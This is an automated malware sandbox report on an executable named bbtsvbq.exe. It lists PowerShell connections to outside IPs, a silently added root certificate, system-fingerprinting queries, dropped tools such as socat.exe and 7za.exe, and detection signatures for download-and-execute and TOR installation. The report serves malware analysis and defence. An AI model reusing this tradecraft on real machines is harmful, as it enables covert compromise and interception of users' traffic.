Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 104.20.73.28 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 212.51.156.17 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 89.45.235.21 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.112 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.121 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 174.129.241.106 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 93.184.221.200 443

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Adds / modifies Windows certificatesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Blob

Language, Device and Operating System Detection:

barindex
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B204B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_013B204B
Contains functionality to query windows versionShow sources
Source: C:\ProgramData\7za.exeCode function: 6_2_0046CF4C EntryPoint,GetVersion,6_2_0046CF4C
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\bbtsvbq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\bbtsvbq.exeCode function: 1_2_013B1E2D cpuid 1_2_013B1E2D
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\Microsoft.Win32.TaskScheduler.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\Microsoft.Win32.TaskScheduler.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeQueries volume information: C:\ProgramData\VitBTKxRu VolumeInformation
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeQueries volume information: C:\ProgramData\VitBTKxRu VolumeInformation
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeQueries volume information: C:\ProgramData\VitBTKxRu VolumeInformation
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exeQueries volume information: C:\ProgramData\VitBTKxRu VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll VolumeInformation

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behavior_graph main Behavior Graph ID: 446656 Sample:  bbtsvbq.exe Startdate:  27/11/2017 Architecture:  WINDOWS Score:  100 1 bbtsvbq.exe 3 14 main->1      started     11 taskeng.exe 1 main->11      started     5821sig Sets a auto configuration URL for Internet Explorer (IE settings are enforced automatically) 86811sig Obfuscated command line found 8582reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 85831reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 85838reducedSig Signatures exceeded maximum capacity for this level. 3 signatures have been hidden. 8582sig Powershell starts a process from the temp directory 85831sig Powershell starts a process from the temp directory 85838sig Powershell starts a process from the temp directory 57912sig Tries to download and execute files (via powershell) 57916sig Tries to download and execute files (via powershell) 57917sig Tries to download and execute files (via powershell) 57918sig Tries to download and execute files (via powershell) 8604reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 86033reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 86023reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 8604sig Found C# or VB.Net code to silently install a certificate (surpess security dialog) 86033sig Found C# or VB.Net code to silently install a certificate (surpess security dialog) 522d1e778460sig Detected TCP or UDP traffic on non-standard ports 522d1e778463sig Detected TCP or UDP traffic on non-standard ports 522d1e778468sig Detected TCP or UDP traffic on non-standard ports 522d1e778471sig Detected TCP or UDP traffic on non-standard ports 86023sig Found C# or VB.Net code to silently install a certificate (surpess security dialog) 8587reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 8246sig Installs TOR (Internet Anonymizer) 8587sig Powershell starts a process from the temp directory 82410sig Installs TOR (Internet Anonymizer) 82415sig Installs TOR (Internet Anonymizer) d1e778458 api.ipify.org 174.129.241.106, 80